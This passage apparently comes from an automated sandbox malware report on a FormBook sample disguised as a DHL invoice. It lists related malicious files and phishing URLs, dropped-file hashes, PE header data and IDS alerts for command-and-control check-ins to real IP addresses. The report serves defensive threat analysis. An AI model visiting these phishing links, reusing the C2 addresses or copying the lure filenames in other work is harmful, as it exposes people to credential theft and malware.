 | https://www.photogallerybd.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPWMydFJkbWs9JnVpZD1VU0VSMjgxMDIwMjRVMjQxMDI4NTQ=N0123N | malicious | Mamba2FA | 165.22.49.66
 | http://deepai.org | malicious | LiteHTTP Bot | 159.89.246.130
 | RuntimeusererVers.exe | malicious | Python Stealer | 159.89.102.253
 | Hire P.O.exe | malicious | FormBook | 167.172.133.32
 | https://0nline1.hao123com.site/?LqbtQF9CuNBmOCSgs5m | malicious | HTMLPhisher | 167.172.98.117
 | https://google-databricks.com/?uniq_id=b92ZeoM | malicious | Unknown | 104.131.67.145
MULTIBAND-NEWHOPEUS | RFQ.exe | malicious | FormBook | 209.74.64.58
 | DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exe | malicious | FormBook | 209.74.64.59
 | https://u47618913.ct.sendgrid.net/ls/click?upn=u001.ySazWJ5NZMDRHbOtEU-2BeoVq5CHimfeKOmAStZ-2FBgQMYQ3SSwsETAhk1yN-2BT4-2Bp2oKYzZov6D-2F-2FVWJZ1NqqUA8rkCQTGD9qAyzE3VfFeoQ2nuSJqqyEFkZOdD2fHyfAGMqPTrK5an3w0r3jeoJ-2B5P7rAm7lpee2LRBP-2FVZ8vpCC6OhMnZUP9C90hQTb0-2BpgFS16pphNEcXB1XFdv8oIx-2FwRORRrbhR98R4uG9rtcNDDwGDlWsc4rC8kZPQKm-2F1Mm8tNwYXTNsqE7C9scBPWKFj8-2Flkc4ljwpAg27SdTSH4Lv1yIeDUc-2Br14vSnR5hortDhaaXBKI0vawIBQmkU8qdJOSHyv8egzfUQvo0FmhKgqV1moo-2BnRe99IbJ35dDYZE0MrccJKFnB5BMI9ztOOsnQMWDWj4usmLc-2BeVbqm24LsVBI18WzbkH2NLJelVG2ts-2FY8NEmgO2IHd2ydt-2BhAOvQWuc-2BoCn3Ao-2FeTWrPbny4XNYysHB9Qu5AO8kwT-2BngJOg10GMOXJS1JsoXicgqZmKM-2B-2FBOfXRHNWtl98FVLgmqGL1yDRbHi-2BrUHFtCwtB3BRDatptZmQIPNmSCXkxadq8IAoDDcDLc8BntBCtxPjmUSXgMaBFfsbPygwonXOkWZIQIxp1wvHXj-2BZ1eIGRPTwfugS5VMB7jYi-2FePeZ2P8ejmUXu0aUYor7jxsavDdhhTlU0d3WGd7xXyc70gSNl4s0N8kb-2FhMFZ3OuPfAMZG-2BGWl7Vsgw97GpKKLJX78rYX8Dtq0-2BFHI8oijeDXiQEnvU-2FI4F3F63PGiFfTUlwdYZGBzmjvsDN3AL1dSwty6HpxvSAKCtZ9VWrfa8NwcaFPKhxnxW4r2AR9TTWpNatEfU14LjPxEM-2F6jXkw8omQsSQ5ERlG1h6ZTouS0rz5yiYIeyCUVpUuOT4FtnK35YgC-2B0S-2FAum0FNVEv9aFTVDigH5szZA6pWOYsjwY5forGtNE55v7VxXGbkIRiEOYPWjYX7vj5EKbcmwdWMu8O3989atXdomEpBZG0cX1ylWoweLRVGVMNbSs-2FOqs-2B2xH8pdGj9VcybpSShtsD0ZIyshNyN0TwKGcJvKUNgMPDQVU64V5WleuedIajiM6uCp0xLc8RFYl0z-2B6RGF9NRTuzleNM-2Fg7hwq-2BEg52eVJjsFh3FdZjf0sr4TFySEDrqq3wci8zEr-2FI5c5Wj-2Fk-2F98bI-2FtCrFbLhfO78CKXQ3KYT53otrRT47GTmw-3D-3DwgKy_cipWnXOVDIhOM-2BBXOyzcHeOgQULBtPxx5riDWemF2G-2BwYzp7goEAXusjqSQprai9ZAQSor3gqS04DnqVBNX-2B27UevOScScKFnEaHJjzQ16GEAAakNELZybevGcJfbhSMyz-2FBkUhDktUr20hzj2tsCmKBBmBXnfL9SKUCvI82Axz3RMcAfJhD5XZvwDkb1SgvyUaaM4lOGnGhDtzRF5NN8-2FlqjhJjS-2FU6ncYoAfO4VYI-3D | malicious | HTMLPhisher | 209.74.72.93
 | statement of accounts.exe | malicious | FormBook | 209.74.64.58
 | rGO880-PDF.exe | malicious | FormBook | 209.74.64.59
 | RFQ.exe | malicious | FormBook | 209.74.64.58
 | Selected_Items.vbs | malicious | FormBook | 209.74.64.59
 | Arrival Notice.exe | malicious | FormBook | 209.74.64.58
 | RFQ.docx | malicious | FormBook | 209.74.64.59
 | AWB_NO_907853880911.exe | malicious | FormBook | 209.74.64.58
ACPCA | Pago SEPA.pdf.exe | malicious | GuLoader | 162.55.60.2
 | Hire P.O.exe | malicious | FormBook | 162.0.211.143
 | Lista de cotizaciones.exe | malicious | DarkCloud | 162.55.60.2
 | New Order___________pdf.exe | malicious | DarkCloud | 162.55.60.2
 | x86.elf | malicious | Mirai | 162.52.29.90
 | http://www.skyunitedlc.com | malicious | Unknown | 162.0.217.112
 | Payment Receipt Attached PDF.exe | malicious | GuLoader | 162.55.60.2
 | Payment Receipt Attached PDF.exe | malicious | GuLoader | 162.55.60.2
 | Order.exe | malicious | FormBook | 162.0.211.143
 | FCGF98760900.bat.exe | malicious | DarkCloud | 162.55.60.2
AMAZON-02US | 0xh0roxxnavebusyoo.arc.elf | malicious | Unknown | 54.171.230.55
 | file.exe | malicious | Amadey, Stealc, Vidar | 18.244.18.38
 | file.exe | malicious | LummaC, Amadey, Stealc, Vidar | 18.244.18.122
 | file.exe | malicious | Amadey, Stealc, Vidar | 18.244.18.122
 | file.exe | malicious | Amadey, Stealc, Vidar | 18.245.113.126
 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 18.244.18.27
 | https://www.hopp.bio/granovitasau | malicious | Unknown | 52.40.206.64
 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 18.245.124.3
 | file.exe | malicious | PureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar | 3.170.115.57
 | x86.elf | malicious | Unknown | 52.11.211.2
No context
No context
Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.3326257413350309
Encrypted: false
SSDEEP: 192:5TbHYzaZ0ni02KpeffxpySaWz3OlTwdNXIqzuiFcZ24lO8WE:RH7Z0p2KQn3a4ou1HzuiFcY4lO8b
MD5: 6D7CACB337FDCF8825EFC5799D63E82A
SHA1: DFF238CA3068B3BFF0CD0E5A6464D0968B4AA27D
SHA-256: 4D24E937B79383EE02806EC80F2F2F11FAEEBEAADBD84E7C366F00C4B2B2AA3D
SHA-512: F2CA3F4C90A0426E55553E453E02E499EED9C4971BADD22071356D232C5F4356BCA146C7021B0F77A2BE0598E78557106755D8152DBC1D6C0EC0794730B21EDF
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.3.0.2.5.0.3.6.7.9.9.6.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.3.0.2.5.0.4.6.4.8.7.1.7.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.e.8.a.0.d.7.d.-.e.e.9.a.-.4.3.e.0.-.a.c.8.c.-.2.a.5.f.6.6.7.a.1.2.0.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.1.2.0.e.6.b.a.-.2.9.6.5.-.4.a.8.3.-.8.a.f.d.-.e.c.5.3.6.3.d.c.8.5.f.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.d.h.l.0.0.9.5.4.4.5.5.4.9.6.1...I.N.V...P.E.K...C.O...0.4.1...2.0.2.4.1.1.1.5...1.8.3.8.4.5...2.0.2.4.1.1.1.5...1.8.3.9.4.8...3.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.u.r.e.n.s.o.h.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.8.c.-.0.0.0.1.-.0.0.1.4.-.6.1.c.f.-.c.0.3.5.c.3.3.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.7.1.6.e.4.5.5.7.2.8.c.c.a.8.9.7.b.0.8.b.6.0.8.6.1.1.8.4.9.9.5.0.0.0.0.0.0.0.0.!.0.0.0.0.2.

Process: C:\Windows\System32\WerFault.exe
File Type: Mini DuMP crash report, 16 streams, Sun Nov 17 07:35:04 2024, 0x1205a4 type
Category: dropped
Size (bytes): 570733
Entropy (8bit): 3.4507427103296475
Encrypted: false
SSDEEP: 3072:jD/8OZFa3+vLHzM4aPsN3bajcSGCRkuOODF6+a1CCqhTyBmr6vUPk5yzUb6c3qF8:jlDa3QLYrI3bIGckJOUqh63qwNzs4
MD5: C47D0EEB0C1FA3F3852EA6969E2CDC49
SHA1: 98BF281BA14656473B484BB54BFFC3D11E41E83C
SHA-256: B1DEED657A96C20ACB61537FDB0C140558627126D9D609BFA913D79C58DACB82
SHA-512: F4A864EE1BD5483E284F15BC0E638F49F6EE5C9303FA8A2863EA6C869E18F0F178748FE19186665401AD29100469040DF627B33FC1970DD349F1D755D755ED03
Malicious: false
Preview: MDMP..a..... .........9g......................... ..........$...t*......$"...*.......b.............l.......8...........T............A...s...........L...........N..............................................................................eJ......@O......Lw......................T.............9g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8774
Entropy (8bit): 3.7174219557175614
Encrypted: false
SSDEEP: 192:R6l7wVeJMHHZ5Nr56Y9lPMHxPgmfZAcfpbFrpr789bl03f4Xm:R6lXJWZ5v6Y/PMHxPgmfacf6lUfV
MD5: 6BA8E2CDA2E3E8073DD23416E2985FAB
SHA1: 3C8392DAE5255D8B8720557E71145D551703C74B
SHA-256: B84E7F277A66E402EAA3ACDA92033E39CE7620B22F1A8732A4B1A30BF68431D7
SHA-512: 98B903430E3DC847907FC6034D1FC748C419853182006FC928B554C5E41B09B34883755D4A3DEDF1F69C84F0F0253DAECBC5629C9ED0A94F1B70934BF2663031
Malicious: false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.4.0.<./.P.i.

Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 5014
                                                                                Entropy (8bit):4.622317621267841
                                                                                Encrypted:false
                                                                                SSDEEP:48:cvIwWl8zsMJg771I9rYWpW8VYvYm8M4J1vLE6Fuiyq8vMLEKJz1Z1Md:uIjfKI7kR7VvJudiWzwJLMd
                                                                                MD5:E9E4302D72BDF0A7688D7376BD74BDAE
                                                                                SHA1:93BD033D929D4425A666629E52E8868E2D57ADF8
                                                                                SHA-256:D38E72F99C4EB85162E1C262D46EDBC548ADC9F7B2FE968F24A0FEEE2F16766D
                                                                                SHA-512:F43A7939807F98F6A3EE120C17EA9183E5A1CDCA5A7BEA616D3178F6DBE2F7EE1CB40D28B29A6D38BB88ACF21217BA8B934048BA922F186DAD40A425C5DBF256
                                                                                Malicious:false
                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="591757" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):64
                                                                                Entropy (8bit):1.1940658735648508
                                                                                Encrypted:false
                                                                                SSDEEP:3:NlllulJnp/p:NllU
                                                                                MD5:BC6DB77EB243BF62DC31267706650173
                                                                                SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                Malicious:false
                                                                                Preview:@...e.................................X..............@..........
                                                                                Process:C:\Windows\SysWOW64\wextract.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                Category:dropped
                                                                                Size (bytes):1835008
                                                                                Entropy (8bit):4.466040577480646
                                                                                Encrypted:false
                                                                                SSDEEP:6144:xIXfpi67eLPU9skLmb0b4rWSPKaJG8nAgejZMMhA2gX4WABl0uNWdwBCswSbn:SXD94rWlLZMM6YFHc+n
                                                                                MD5:DE3ED05C1D85197ADC7308B720D9DF0C
                                                                                SHA1:6A1ABAE2CDE6F2196AE88EB89315FF577BF608D5
                                                                                SHA-256:5EB4D77483FF9C5BEFB49FE82306D5C80A4A4CDA068D4BFD626DCE52B5D0495D
                                                                                SHA-512:2261E937EAB70726B6D61AF58D527D5B2DBA97C80E36CD092B8C774D75A9CE085B96D8D3EFE5752B3B5F2A0F34413FDBABAA1735332D49C0459CA9CDC081594E
                                                                                Malicious:false
                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.rU7.8................................................................................................................................................................................................................................................................................................................................................B.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):4.407550864019621
                                                                                TrID:
                                                                                • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                • Win64 Executable GUI (202006/5) 46.43%
                                                                                • Win64 Executable (generic) (12005/4) 2.76%
                                                                                • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                • DOS Executable Generic (2002/1) 0.46%
                                                                                File name:dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe
                                                                                File size:3'359'817 bytes
                                                                                MD5:0df139fa0f5d3a83ecff651fdd692c68
                                                                                SHA1:2c6e2af9e1602bc83e5c5919c75ad4aa120c0d1b
                                                                                SHA256:165f9bea48c75c958594f2d88cbe59d007f506cc49c4500dfcee93dedb6f8cac
                                                                                SHA512:5c22d2c7328f230be9a67c47559599e5b5f0d959fa3ff5c03795bca32414c695c0a7e38e2f56ce9ffc6362354de86b8e42943dbcba489df40d6dda2bfc8e5782
                                                                                SSDEEP:12288:c6rZU6UthuUujCCjLIrN9wUbJVaRZLZLCWGG8F8+5:xlUBuljC/N9waVAwF8+5
                                                                                TLSH:E4F522D135AB0E63FE6A60BAE6E6B4F554FC9D0B34F84E1FCF598C0558AA07C4616230
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....a..........."...0.4'............... ....@...... ....................................`................................
                                                                                Icon Hash:90cececece8e8eb0
                                                                                Entrypoint:0x400000
                                                                                Entrypoint Section:
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x916198D0 [Wed Apr 17 05:40:32 2047 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:
                                                                                Instruction
                                                                                dec ebp
                                                                                pop edx
                                                                                nop
                                                                                add byte ptr [ebx], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax+eax], al
                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6000 | 0x5a6 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x4718 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x2734 | 0x2800 | eb272c63c8ab696337af4ab5c9d53ebb | False | 0.5525390625 | data | 5.779066063872368 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x6000 | 0x5a6 | 0x600 | 9a9b1eb281957316b1b1779ad352807f | False | 0.4147135416666667 | data | 4.056084266397839 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x60a0 | 0x31c | data | | | 0.4296482412060301
RT_MANIFEST | 0x63bc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-17T08:35:54.803469+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49742 | 3.33.130.190 | 80 | TCP
2024-11-17T08:36:10.681399+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49792 | 64.225.91.73 | 80 | TCP
2024-11-17T08:36:13.243548+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49807 | 64.225.91.73 | 80 | TCP
2024-11-17T08:36:15.795679+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49822 | 64.225.91.73 | 80 | TCP
2024-11-17T08:36:18.451019+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49838 | 64.225.91.73 | 80 | TCP
2024-11-17T08:36:24.257088+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49869 | 209.74.64.187 | 80 | TCP
2024-11-17T08:36:26.754764+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49884 | 209.74.64.187 | 80 | TCP
2024-11-17T08:36:29.320780+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49900 | 209.74.64.187 | 80 | TCP
2024-11-17T08:36:31.864264+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49915 | 209.74.64.187 | 80 | TCP
2024-11-17T08:36:45.687951+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49989 | 162.0.215.33 | 80 | TCP
2024-11-17T08:36:48.234082+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50001 | 162.0.215.33 | 80 | TCP
2024-11-17T08:36:50.826946+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50017 | 162.0.215.33 | 80 | TCP
2024-11-17T08:36:53.370528+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50020 | 162.0.215.33 | 80 | TCP
2024-11-17T08:36:59.083627+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50021 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:01.830447+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50022 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:04.176598+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50023 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:06.722391+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50024 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:12.618902+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50025 | 98.124.224.17 | 80 | TCP
2024-11-17T08:37:15.155421+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50026 | 98.124.224.17 | 80 | TCP
2024-11-17T08:37:17.703737+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50027 | 98.124.224.17 | 80 | TCP
2024-11-17T08:37:20.466700+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50028 | 98.124.224.17 | 80 | TCP
2024-11-17T08:37:26.242161+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50029 | 67.223.117.169 | 80 | TCP
